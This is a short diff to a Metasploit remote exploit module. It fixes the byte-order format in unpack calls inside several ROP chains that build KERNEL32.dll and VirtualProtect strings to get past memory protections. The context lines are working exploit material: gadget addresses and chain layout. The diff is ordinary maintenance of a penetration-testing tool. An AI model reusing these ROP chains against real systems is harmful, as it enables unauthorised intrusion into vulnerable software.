@@ -931,9 +931,9 @@ class MetasploitModule < Msf::Exploit::Remote
           0x631017ff, # pop ebp; ret
           0x631213e6, # add esp, 0x20; ret
           0x63137a3c, # pushal; ret
-          'KERN'.unpack('<L')[0],
-          'EL32'.unpack('<L')[0],
-          '.dll'.unpack('<L')[0],
+          'KERN'.unpack('L<')[0],
+          'EL32'.unpack('L<')[0],
+          '.dll'.unpack('L<')[0],
           0,
           0x63117dfa, # pop edi; ret
           0x6311de4c, # pop edi; pop ebp; ret
@@ -943,10 +943,10 @@ class MetasploitModule < Msf::Exploit::Remote
           0x63116cc9, # pop esi; ret
           0x631213e6, # add esp, 0x20; ret
           0x63137a3c, # pushal; ret
-          'Virt'.unpack('<L')[0],
-          'ualP'.unpack('<L')[0],
-          'rote'.unpack('<L')[0],
-          "ct\0\0".unpack('<L')[0],
+          'Virt'.unpack('L<')[0],
+          'ualP'.unpack('L<')[0],
+          'rote'.unpack('L<')[0],
+          "ct\0\0".unpack('L<')[0],
           0x6314de45, # xchg eax, edi; ret
           0x6311db46, # push esp; pop esi; ret
           0x6311a398, # xchg eax, esi; ret
@@ -974,9 +974,9 @@ class MetasploitModule < Msf::Exploit::Remote
           0x6310184f, # pop ebp; ret
           0x6313937d, # add esp, 0x20; ret
           0x6311c618, # pushal; ret
-          'KERN'.unpack('<L')[0],
-          'EL32'.unpack('<L')[0],
-          '.dll'.unpack('<L')[0],
+          'KERN'.unpack('L<')[0],
+          'EL32'.unpack('L<')[0],
+          '.dll'.unpack('L<')[0],
           0,
           0x63198d07, # xchg eax, ebp; mov edi, 0xc483fff9; or al, 0x5e; ret
           0x6311e378, # pop edi; ret
@@ -984,10 +984,10 @@ class MetasploitModule < Msf::Exploit::Remote
           0x631289b9, # pop esi; ret
           0x6313937d, # add esp, 0x20; ret
           0x6311c618, # pushal; ret
-          'Virt'.unpack('<L')[0],
-          'ualP'.unpack('<L')[0],
-          'rote'.unpack('<L')[0],
-          "ct\0\0".unpack('<L')[0],
+          'Virt'.unpack('L<')[0],
+          'ualP'.unpack('L<')[0],
+          'rote'.unpack('L<')[0],
+          "ct\0\0".unpack('L<')[0],
           0x631289b9, # pop esi; ret
           0x631018aa, # pop eax; ret
           0x63198446, # mov edi, eax; call esi
@@ -1017,9 +1017,9 @@ class MetasploitModule < Msf::Exploit::Remote
           0x6310184f, # pop ebp; ret
           0x631394ad, # add esp, 0x20; ret
           0x6311c69c, # pushal; ret
-          'KERN'.unpack('<L')[0],
-          'EL32'.unpack('<L')[0],
-          '.dll'.unpack('<L')[0],
+          'KERN'.unpack('L<')[0],
+          'EL32'.unpack('L<')[0],
+          '.dll'.unpack('L<')[0],
           0,
           0x6311e3c0, # pop edi; ret
           0x631018aa, # pop eax; ret
@@ -1029,10 +1029,10 @@ class MetasploitModule < Msf::Exploit::Remote
           0x63128a39, # pop esi; ret
           0x631394ad, # add esp, 0x20; ret
           0x6311c69c, # pushal; ret
-          'Virt'.unpack('<L')[0],
-          'ualP'.unpack('<L')[0],
-          'rote'.unpack('<L')[0],
-          "ct\0\0".unpack('<L')[0],
+          'Virt'.unpack('L<')[0],
+          'ualP'.unpack('L<')[0],
+          'rote'.unpack('L<')[0],
+          "ct\0\0".unpack('L<')[0],
           0x63128a39, # pop esi; ret
           0x631018aa, # pop eax; ret
           0x631993e6, # mov edi, eax; call esi
